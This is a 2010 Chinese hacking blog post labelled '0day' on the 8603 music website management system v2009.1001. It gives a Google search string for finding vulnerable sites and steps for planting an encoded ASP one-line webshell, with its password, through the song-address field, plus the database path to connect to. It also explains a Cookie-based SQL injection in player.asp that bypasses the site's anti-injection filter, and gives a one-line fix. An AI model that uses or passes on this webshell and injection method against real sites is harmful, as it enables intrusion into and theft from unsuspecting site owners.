8603音乐网管理系统 v2009.1001 0day

2010, April 8, 9:15 AM. 漏洞分析
Submitted by admin

8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

数据库未作任何处理,可以插入一句话。继续插入经典一句话。┼攠數畣整爠煥敵瑳∨≡┩愾 密码a

Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。
数据库地址:/data/%23datalink.asa

二,classid处可以Cookies注入
classid=request("classid")
set rs1=server.createobject("adodb.recordset")
rs1.open "select * from feilei where classid="&classid,conn,1,3
classid=rs1("classid")

这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。

变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),


看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.

也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注

入也就产生了


用注入中转。怎么快怎么来。

转载请注明:んㄗ葑訫鎖愛'S Blog http://www.virusest.com/

Tags: 0day

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):